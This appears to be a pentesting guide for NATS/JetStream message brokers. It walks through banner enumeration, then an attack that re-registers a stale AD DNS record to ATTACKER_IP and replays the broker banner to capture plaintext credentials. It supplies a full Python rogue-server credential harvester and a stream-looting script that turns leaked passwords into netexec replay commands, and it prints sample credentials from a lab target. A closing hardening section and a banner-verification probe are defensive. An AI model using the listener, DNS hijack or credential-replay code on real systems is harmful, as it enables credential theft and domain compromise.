4222 - Pentesting NATS / JetStream

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

NATS is a high-performance message bus that speaks a simple line-oriented text protocol: the server sends a JSON banner INFO { ... } as soon as the TCP connection is established, and the client answers with a CONNECT {"user":"USERNAME","pass":"PASSWORD",...} frame followed by optional PING/PUB/SUB commands. JetStream adds persistence primitives (Streams and Consumers) on top of the same TCP port (4222/tcp). Both TLS and authentication are optional, so many internal deployments run plaintext auth, which means user/pass travel in the clear inside CONNECT.

  • Default port: 4222/tcp for clients (cluster routes default to 6222/tcp and the HTTP monitoring endpoint to 8222/tcp)
  • Stock banner fields: "server_id", "version", "proto", "auth_required", "jetstream", "max_payload"; "tls_required":true is only present when the server has a tls block configured

Enumeration

nmap -p4222 -sV --script banner TARGET
# Sample output
# 4222/tcp open  nats  NATS.io gnatsd 2.11.3
# | banner: INFO {"server_id":"NDo...","version":"2.11.3","proto":1,"auth_required":true,"jetstream":true,"max_payload":1048576}

The INFO frame can also be pulled by hand; the banner arrives before the client sends anything, so it leaks version, auth/TLS requirements and JetStream availability with no credentials at all:

echo | nc HOST 4222
INFO {"server_id":"NCLWJ...","version":"2.11.3","auth_required":true,"jetstream":true}
-ERR 'Authorization Violation'

With auth_required set, any operation sent before a valid CONNECT is rejected with an -ERR line (and an idle connection is closed with -ERR 'Authentication Timeout' once auth_timeout expires), but the banner has already been disclosed at that point.

Install the official CLI (Go ≥1.21) for richer interaction:

go install github.com/nats-io/natscli/nats@latest
nats -s nats://HOST:4222 rtt

Authentication failures immediately return nats: Authorization Violation, so valid credentials are required for anything beyond reading the banner.

Credential capture via DNS/service impersonation

  • Look for AD DNS records for the broker hostname (e.g. nats-svc.domain.local) that no longer exist. If the name returns NXDOMAIN, any authenticated domain user can usually (re)create it thanks to the default dynamic-update ACLs on AD-integrated zones. See AD DNS Records abuse for the background.
  • Register the hostname to an attacker-controlled IP (use nsupdate -g after obtaining a Kerberos ticket when the zone only accepts secure, GSS-TSIG signed updates):
nsupdate
> server DC_IP
> update add nats-svc.domain.local 60 A ATTACKER_IP
> send
  • Capture a legitimate banner once, then replay it to every client that shows up. NATS clients trust the first INFO line they receive, so piping it through a listener is enough (this one-liner serves a single connection; loop it for more):
nc REAL_NATS 4222 | head -1 | nc -lnvp 4222
  • As soon as an internal client resolves the hijacked name, it sends a plaintext CONNECT frame carrying the user / pass pair plus assorted telemetry (client name, language, library version, protocol level). Because nothing beyond the INFO banner is required to trigger it, even nc is enough to harvest the secret.
  • For longer-running operations, run the official server yourself (git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V). TRACE logging (-V) already shows usernames; removing the redaction helper from the source, or simply sniffing the traffic with Wireshark, reveals the full password.
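The whole exchange described above as an added example (this is not code from the original page or from the NATS project): a small Python listener that plays the server side of the protocol. It replays a captured INFO banner, answers PING with PONG so the fooled client stays connected, and records the credential and telemetry fields from every CONNECT it receives. The banner, the bind address and the field names to keep are assumptions for the example; replace CAPTURED_INFO with the line you grabbed from the real broker.

```python
import json
import socket

# Constructed banner: per the technique above, capture the real server's INFO line
# once and replay it verbatim. The server_id/version values here are placeholders.
CAPTURED_INFO = (
    b'INFO {"server_id":"NCLWJ...","version":"2.11.3","proto":1,'
    b'"auth_required":true,"jetstream":true,"max_payload":1048576}\r\n'
)

# CONNECT options worth keeping: credentials first, then the telemetry mentioned above.
SECRET_FIELDS = ("user", "pass", "auth_token", "jwt", "nkey", "sig")
TELEMETRY_FIELDS = ("name", "lang", "version", "protocol", "tls_required")


def parse_connect(frame: bytes) -> dict:
    """Decode one 'CONNECT {...}' line (trailing CRLF optional) into its JSON options."""
    op, _, payload = frame.strip().partition(b" ")
    if op.upper() != b"CONNECT":
        raise ValueError(f"expected CONNECT, got {op!r}")
    return json.loads(payload)


def harvest(frame: bytes) -> dict:
    """Return only the credential and telemetry fields of a CONNECT frame."""
    opts = parse_connect(frame)
    return {k: opts[k] for k in SECRET_FIELDS + TELEMETRY_FIELDS if k in opts}


def handle_client(conn: socket.socket, banner: bytes, sink: list) -> None:
    """Play the server role: send the banner, answer PINGs, record every CONNECT."""
    with conn:
        conn.sendall(banner)
        buf = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                return
            buf += chunk
            while b"\r\n" in buf:
                line, buf = buf.split(b"\r\n", 1)
                op = line.split(b" ", 1)[0].upper()
                if op == b"CONNECT":
                    try:
                        sink.append(harvest(line))
                    except ValueError:
                        sink.append({"raw": line})  # keep malformed frames for later review
                elif op == b"PING":
                    conn.sendall(b"PONG\r\n")  # keeps the fooled client connected
                # anything else (SUB/PUB) is accepted silently; nothing is relayed


def rogue_listener(bind: str, port: int, banner: bytes, sink: list, max_clients=None) -> list:
    """Listen like a NATS server and collect CONNECT frames into `sink`."""
    served = 0
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen()
        while max_clients is None or served < max_clients:
            conn, peer = srv.accept()
            before = len(sink)
            handle_client(conn, banner, sink)
            served += 1
            for entry in sink[before:]:
                print(f"[{peer[0]}] {entry}")
    return sink


if __name__ == "__main__":
    # Bind on the IP the hijacked DNS name now points to; Ctrl-C to stop.
    rogue_listener("0.0.0.0", 4222, CAPTURED_INFO, [])
```

Nothing is forwarded to the real broker, so the victim's publishes are lost; if the service needs to keep working during the capture window, pass max_clients=1 and point the DNS record back at the real server as soon as the first CONNECT has been logged.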

JetStream looting & password hunting

Once any credential has been obtained (e.g. Dev_Account_A), save it as a CLI context so it does not have to be retyped:

nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'

JetStream discovery usually follows this pattern:

nats account info --context mirage      # quotas, stream count, expiration
nats stream list --context mirage       # names + message totals
nats stream info auth_logs --context mirage
nats stream view auth_logs --context mirage

Teams that rely on streaming often publish authentication events on subjects such as logs.auth. If developers persist the raw JSON into a JetStream stream, the payloads can contain plaintext AD usernames and passwords:

{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}

Harvested secrets can then be replayed against Kerberos-only services with netexec smb DC01 -u USER -p PASS -k, enabling full domain compromise.
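As an added example (not from the original page), a Python scanner for the messages pulled out of a stream: it walks nested JSON, falls back to key=value parsing for plain-text log lines, pairs each secret with the user field living in the same object, skips empty placeholders, and renders the netexec replay line used above. The stream contents in SAMPLE_STREAM are constructed, not real captures; how they are fetched (nats stream view, a nats-py pull consumer, a saved dump) is outside the example.

```python
import json
import re

# Key names that usually hold a secret, and the matching principal, in log events.
SECRET_KEYS = re.compile(r"^(pass(word|wd)?|pwd|secret|token|api[_-]?key)$", re.I)
USER_KEYS = re.compile(r"^(user(name)?|login|account|sAMAccountName|upn)$", re.I)
# Fallback for non-JSON lines such as: login ok user=bob password="hunter 2"
KV_RE = re.compile(r"""(?P<key>[A-Za-z_][A-Za-z0-9_]*)\s*[=:]\s*(?P<val>"[^"]*"|'[^']*'|\S+)""")


def _walk(obj, path=""):
    """Yield (dotted_path, leaf_key, value) for every scalar in a nested JSON document."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _walk(v, f"{path}.{k}" if path else k)
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from _walk(v, f"{path}[{i}]")
    else:
        leaf = re.sub(r"\[\d+\]$", "", path.rsplit(".", 1)[-1])
        yield path, leaf, obj


def _parent(path):
    return path.rsplit(".", 1)[0] if "." in path else ""


def hunt(payload: bytes, subject: str = "", seq: int = 0) -> list:
    """Find credential pairs in one message: JSON is walked, anything else is key=value scanned."""
    text = payload.decode("utf-8", errors="replace")
    try:
        fields = list(_walk(json.loads(text)))
    except ValueError:
        fields = [(m["key"], m["key"], m["val"].strip("\"'")) for m in KV_RE.finditer(text)]
    users = [(p, v) for p, k, v in fields if USER_KEYS.match(k) and isinstance(v, str)]
    hits = []
    for p, k, v in fields:
        if not (SECRET_KEYS.match(k) and isinstance(v, str) and v):
            continue  # empty or non-string "password" fields are noise
        # Prefer a user field that sits in the same JSON object as the secret.
        user = next((u for up, u in users if _parent(up) == _parent(p)), None)
        if user is None and users:
            user = users[0][1]
        hits.append({"subject": subject, "seq": seq, "user": user, "secret": v, "where": p})
    return hits


def hunt_stream(messages) -> list:
    """messages: iterable of (subject, sequence, payload_bytes) taken from a stream."""
    hits = []
    for subject, seq, payload in messages:
        hits.extend(hunt(payload, subject, seq))
    return hits


def to_netexec(hits, target="DC01") -> list:
    """Render every user/secret pair as the Kerberos replay command used above."""
    return [f"netexec smb {target} -u '{h['user']}' -p '{h['secret']}' -k" for h in hits if h["user"]]


# Constructed sample of what a stream such as auth_logs might contain.
SAMPLE_STREAM = [
    ("logs.auth", 1, b'{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}'),
    ("logs.auth", 2, b'{"event":"login","actor":{"username":"svc_backup","pass":"Winter2024!"},"ok":true}'),
    ("logs.auth", 3, b'login ok user=mark.bb password="Sp@ce 42" ip=10.10.10.31'),
    ("logs.auth", 4, b'{"user":"noone","password":"","ip":"10.10.10.5"}'),
    ("logs.app", 5, b"heartbeat seq=5"),
]

if __name__ == "__main__":
    for cmd in to_netexec(hunt_stream(SAMPLE_STREAM)):
        print(cmd)
```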

Hardening & detection

  • Enforce TLS (a tls block makes the server advertise tls_required; verify: true turns it into mTLS) and prefer challenge-response authentication (nkeys or .creds/JWT, where the client signs the nonce from INFO) over user/pass, so even a captured CONNECT carries no reusable password. Without encryption, INFO/CONNECT leak credentials to anyone on-path.
  • Restrict who can update DNS: move service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Correlate with scavenging alerts so that a broker name that disappears cannot be claimed silently.
  • Stop logging credentials: redact secrets before publishing them to subjects, set JetStream retention and max-age limits so stale records expire, and restrict who can purge or delete messages (deny_delete=false only on streams managed by trusted operators).
  • Monitor for banner anomalies: bursts of short-lived connections, Authentication Timeout / Authorization Violation errors in the server log, or INFO banners whose fields do not match the known broker template point to banner-grabbing or a spoofed server.
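An added example for the last bullet (not from the original page): a Python probe that connects to the broker hostname, reads the first line, parses it as INFO, diffs the stable fields against a golden template recorded from the real server, and, when the template says TLS is required, completes the TLS handshake with certificate verification. A replayed banner is only a copy, so an impersonator fails exactly that last step. The GOLDEN values and the probed hostname are assumptions for the example; fill them in from the legitimate INFO line captured during onboarding.

```python
import json
import socket
import ssl

# Golden template recorded from the legitimate broker (constructed values; replace with
# the stable INFO fields of the real server).
GOLDEN = {
    "version": "2.11.3",
    "proto": 1,
    "auth_required": True,
    "tls_required": True,
    "jetstream": True,
    "max_payload": 1048576,
}


def parse_info(first_line: bytes) -> dict:
    """Parse 'INFO {...}\\r\\n'; anything else as the first line is already suspicious."""
    op, _, payload = first_line.strip().partition(b" ")
    if op != b"INFO":
        raise ValueError(f"first line is not INFO: {first_line[:40]!r}")
    return json.loads(payload)


def check_banner(info: dict, golden: dict = GOLDEN) -> list:
    """Return one finding per field that deviates from the template; [] means it matches."""
    findings = []
    for key, expected in golden.items():
        actual = info.get(key)  # a missing key (e.g. tls_required dropped) counts as a mismatch
        if actual != expected:
            findings.append(f"{key}: expected {expected!r}, got {actual!r}")
    return findings


def _readline(sock: socket.socket, limit: int = 64 * 1024) -> bytes:
    """Read exactly one CRLF-terminated line so no bytes are consumed past the banner."""
    buf = b""
    while not buf.endswith(b"\r\n") and len(buf) < limit:
        b = sock.recv(1)
        if not b:
            break
        buf += b
    return buf


def probe(host: str, port: int = 4222, timeout: float = 3.0,
          golden: dict = GOLDEN, cafile: str = None) -> list:
    """Connect, compare the banner with the template and verify the TLS certificate."""
    findings = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            first = _readline(s)
            if not first:
                return ["connection closed before any banner was sent"]
            findings += check_banner(parse_info(first), golden)
            if golden.get("tls_required"):
                # NATS upgrades to TLS after INFO; a banner-replaying impersonator
                # cannot present a certificate that validates for this hostname.
                ctx = ssl.create_default_context(cafile=cafile)
                with ctx.wrap_socket(s, server_hostname=host) as tls:
                    tls.getpeercert()
    except ssl.SSLError as e:
        findings.append(f"TLS handshake failed (possible impersonator): {e}")
    except (OSError, ValueError) as e:
        findings.append(f"probe error: {e}")
    return findings


if __name__ == "__main__":
    # Hostname is an assumption; run this from the monitoring host on a schedule.
    for line in probe("nats-svc.domain.local") or ["banner and certificate match template"]:
        print(line)
```

Run it from the same resolver path the clients use, so that a hijacked DNS record is what gets probed rather than a hard-coded IP.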
